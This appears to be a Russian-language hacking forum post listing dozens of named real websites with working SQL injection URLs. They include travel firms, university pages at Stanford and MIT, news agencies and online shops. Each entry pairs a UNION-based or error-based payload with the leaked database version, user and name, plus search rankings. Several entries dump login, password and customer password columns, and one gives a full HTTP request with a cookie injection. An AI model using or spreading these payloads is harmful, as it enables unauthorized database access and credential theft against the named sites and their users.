Горящие туры в Грецию, Бали, Кипр, Тайланд - Туристическая фирма Познай Мир. тИЦ - 90 Code: http://www.poznay-mir.ru/about.php?uid=-1 AND 1=0 UNION ALL SELECT 1,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,database(),version(),user()),0x3c2f454d553e),3,4,5 poznaymir;5.0.87;[email protected] Code: http://www.borodin-moka.ru/answers/index.php?id=-1 AND 1=0 UNION ALL SELECT 1,2,3,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,user(),database(),version()),0x3c2f454d553e) borodin-mokaru@localhost;borodinmokaru;5.0.51a-24+lenny5-log
Мировое искусство: живопись, литература, анимация, кино. Code: http://www.world-art.ru/cinema/cinema_episode.php?id=18187&episode=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),6,7,8,9,10,11,12,13-- Database Version: 5.5.2-m2-log Database name: wwwworldartru User name: worldart@localhost ТИЦ: 1700 PR: 3 Федеральный альянс по безопасности дома. Code: http://flash.org/peril_inside.php?id=1-0.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5-- Database Version: 5.0.77-log Database name: flash User name: flash@localhost ТИЦ: 10 PR: 7 Саундтреки к фильмам. Code: http://www.soundtrack.net/trailers/composer-trailer.php?id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),2,3,4-- Database Version: 5.0.77 Database name: STN User name: stn@localhost ТИЦ: 70 PR: 6
Code: http://hci.[COLOR=White]stanford[/COLOR].[COLOR=Red][SIZE=2][B][COLOR=Lime]edu[/COLOR][/B][/SIZE][/COLOR]/courses/cs547/speaker.php?date=-2012-01-27'+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,0,11,12,13,14,15,16--+ Database Version: 5.0.77 Database name: hci User name: hci@localhost --------------------------------------------------------------------------------------------------------- Code: http://icme.[COLOR=White]stanford[/COLOR].[COLOR=Lime][SIZE=2][B]edu[/B][/SIZE][/COLOR]/seminars/seminarInfo.php?seminar_id=17+union+select+1,2,3,4,5,6,7,8,9,0,11,group_concat(table_name),13,14,15,16+from+information_schema.tables-- Database Version: 5.1.49-3~bpo50+1-log Database name: d_ICME_website User name: [email protected]
free-jpeg.ru SQL инъекция в INSERT запросе, параметр в куках, метод - Error based, дак еще и каптчу каждый раз придется вводить. POST http://free-jpeg.ru/reg/ Head: Code: Host: free-jpeg.ru User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://free-jpeg.ru/registration/ Cookie: ref=681%27%2C%27123123123%27%29+ON+DUPLICATE+KEY+UPDATE+a%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+concat_ws(0x3a,database(),version(),user())+from+information_schema.tables+limit+0,1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information_schema.tables+group+by+x%29a%29--+11; PHPSESSID=_SESS_HERE_ Content-Type: application/x-www-form-urlencoded Content-Length: 109 Body Code: name=Soochechqa&email=123123s%40sd.ru&wm=R9999999999&pass=R9999&pass2=R9999&code=CAPTCHA_HERE&imageField.x=59&imageField.y=19 _SESS_HERE_ - PHPSESSID CAPTCHA_HERE - код что изображен на http://free-jpeg.ru/captcha/pic.php Результат: Code: Duplicate entry 'qwcat_urgepjeerf1102g:5.1.49-rel11.3-log:043353008_nit50h@local' for key 'group_key'
ТИЦ 160 Траф 2К Code: http://www.vizd.ru/informdesk.php?cat=27&ann_id=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11,12,13--+ [email protected]:vizd_db:5.0.77
Комитет участников рынка ценных бумаг. Code: http://www.comitet.ru/forum/see.php?id=666-666+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5,6-- Database Version: 5.0.45-log Database name: h2safed_comitet User name: [email protected] ТИЦ: 50 PR: 4 Финский туризм. Code: http://www.to-finland.ru/index.php?id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())-- Database Version: 5.1.49-3-log Database name: z70438_finb User name: [email protected] ТИЦ: 60 PR: 3 Студенческая гильдия. Code: http://www.guildonline.net/sgdsp/dispsite.php?groupsiteseq=1&pageseq=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4-- Вывод в титле. Database Version: 4.1.20 Database name: c17db1 User name: c17my1@localhost ТИЦ: 0 PR: 5
тИц: 40 PR: 4 Code: http://golosislama.ru/?cat=-1'+union+select+1,login,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21+%0Afrom+users+limit+1,1000+--+
Code: http://web.mit.edu/press/component/mitexperts/?catid=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13--+
interself.ru ТИЦ-110 Code: www.interself.ru/info/newsshow.php?num=-273+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8+--+ Code: 5.1.45-log:ud_03_01adm@localhost:ud_03_44668_interself lovemarks.com PR-5 Code: www.lovemarks.com/index.php?pageID=20026&_fr_collectionid=36&_fr_collection1id=-147+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14+--+ Code: 5.0.77:ssl_mysql@localhost:svl_lovemarks_stage cminds.org PR-5 Code: www.cminds.org/index.php?option=com_discussions&view=thread&catid=2:demo-forum&thread=1'+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23--+a Code: 5.0.91mm-log:cminds27_jo151@localhost:cminds27_jo151 azbuk.net ТИЦ-110 Code: http://www.azbuk.net/newbook/print.php?num=-13556+union+select+1,concat_ws(0x3a,version(),user(),database()),3+--+ Code: 5.1.29-rc:[email protected]:sat_book
Тиц:10 PR:6 Code: http://www.rssmix.com/engine.php?mix_id=-1+union+select+concat(user,0x3a,password)+from+mysql.user+limit+0,1+--+ Тиц:0 PR:5 Code: http://www.phparchitecture.com/howto_show.php?id=-1+union+select+1,2,concat(usrName,0x3a,usrPassword),4,5+from+paAdmin+--+ Тиц:1100 PR:8 .edu Code: http://www.usc.edu/schools/price/faculty/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+ Тиц:700 PR:4 Code: http://iran.ru/rus/print_news.php?news_id=-1+union+select+1,version(),3,4,5,6,7,8+--+
Тиц:220 PR:4 Code: http://kinosalut.ru/movie.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13+--+ Тиц:0 PR:4 Code: http://romanykultury.info/news/news.php?row=-333+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5
Карл Девис (композитор). Code: http://www.carldaviscollection.com/gallery2.php?category_id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6-- Внутри много БД соседей. Database Version: 5.1.53-log Database name: carldavis User name: [email protected] ТИЦ: 0 PR: 5 Торговая площадка. Code: http://trade-world.org/company_leads.php?id=3581359&file=Selling&prod=prod&cat_id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10-- Database Version: 5.1.51-log Database name: tradeworld User name: tradeworld@localhost ТИЦ: 0 PR: 3 ССПП ЗАО «Сортсемовощ» (Санкт-Петербург). Code: http://www.e-seed.ru/index.php?id=4&tip=1-0.1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),7,8,9,10,11,12,13,14,15,16-- Database Version: 4.0.27-max-log Database name: euromart_seed User name: [email protected] ТИЦ: 40 PR: 2
Code: https://007airsoft.com/category.php?cat=2+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database())+--+ http://aaminc.com/category.php?cat=2&id=81+and(select+1+from(select+count(*),concat((concat_ws(0x3a,user(),version(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+ http://americansportreview.com/manufacturers.php?cat=2&subcat=10+and(select+1+from(select+count(*),concat((concat_ws(0x3a,user(),version(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+ http://andrews-tiles.co.uk/view_category.php?cat=2'+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5+--+ http://www.antiquesoftheindies.com/category.php?cat=2+and+0+/*!UNION*/+/*!SELECT*/+1,concat_ws(0x3a,user(),version(),database()),3,4+--+ http://bartharris.com/detail.php?cat=5&page=1&id=628)+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4+--+ page body img link http://bash.net.au/category.php?cat=2+and+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8+--+ http://www.beautydesign.com/category.php?product_category=Island-Stations&cat=25'+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13+--+ http://cadogan-gifts.com/ViewCategory.php?cat=2+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5+--+ http://caribee.com/product.php?prd=43+and+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12+--+ http://classifieds.up.net/detail.php?cat=2&de=37493+and(select+1+from(select+count(*),concat((binary(concat_ws(0x3a,user(),version(),database()))),floor(rand(0)*2))x+from+geeklog.user+group+by+x)a) http://community.caithness.org/category.php?cat=2+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6+--+ http://destroyedbrand.com/category.php?cat=2)+and+0+UNION+SELECT+1,concat(user(),0x3a,version(),0x3a,database())+--+ http://dnd.thesepixels.com/photo_moreinfo.php?image=322+and+0+/*!UNION*/+/*!SELECT*/+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7+--+ http://floridachain.org/issues-category.php?imagen=fuck&cat=2'+and(select+1+from(select+count(*),concat((binary(concat_ws(0x3a,user(),version(),database()))),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+ http://furnituredirect.com.au/site/category.php?cat=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+ http://galacticpharm.com/getcategory.php?cat=5'+and+0+UNION+SELECT+1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5+--+ http://gamerbattles.com/category.php?cat=2+and(select+1+from(select+count(*),concat((concat_ws(0x3a,user(),version(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) http://genessee-avenue.org/GA_Web/Display_Ministry.php?min=17+and+0+UNION+SELECT+1,2,3,4,5,binary(concat_ws(0x3a,user(),version(),database())),7/* http://gotsales.com/category.php?cat=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+ http://gryubieranki.eu/category.php?page=4&cat=2+and(select+1+from(select+count(*),concat((concat_ws(0x3a,user(),version(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+ http://halftimegames.com/category.php?cat=2+and+0+/*!UNION*/+/*!SELECT*/+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13+--+ http://horstwelding.com/hla_category.php?cat=2'+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10+--+
Шоп с косметикой Code: hxxp://www.mybeautycenter.com/customer_testimonials.php?testimonial_id=5%20union %20select%201,2,3,4,5,concat(0x3a,customers_passwo rd),7,8,9,10,11%20from%20customers
Информационное агентство "Интерфакс-Казахстан" Code: www.interfax.kz/?lang=rus&int_id=13&category=currently&news_id=-138+union+select+1,2,3,group_concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database()),5,6,7,8,9,10,11 Тиц:950 PR:6
Что-то про электрику. Code: http://www.super-electric.com/Consumer/ceilingfans.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),11,12,13,14,15,16,17,18,19,20-- File_Priv = Y Database Version: 5.1.35-community Database name: super electric User name: root@localhost ТИЦ: 0 PR: 5
SPIROL International Corporation. Code: http://www.spirol.com/company/news/press_d.php?ID=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),2,3,4,5,6,7,8,9,10,11-- Database Version: 5.1.52 Database name: spirol User name: root@localhost ТИЦ: 10 PR: 3
[Inf from DB] -> [ User: [email protected] Database: u52540 Version: 5.0.90-log ] [Vulnberable URL] -> [ ТиЦ ] -> [0] [Yandex PR] -> [0] [Alexa TR] -> [Unknown] [DIRS] [http://www.flaginfo.ru/info.php] -> [200] [Inf from DB] -> [ User: [email protected] Database: 1gb_bmw999 Version: 5.0.45-community-nt-log ] [Vulnberable URL] -> [ ТиЦ ] -> [10] [Yandex PR] -> [2] [Alexa TR] -> [Unknown] [DIRS]
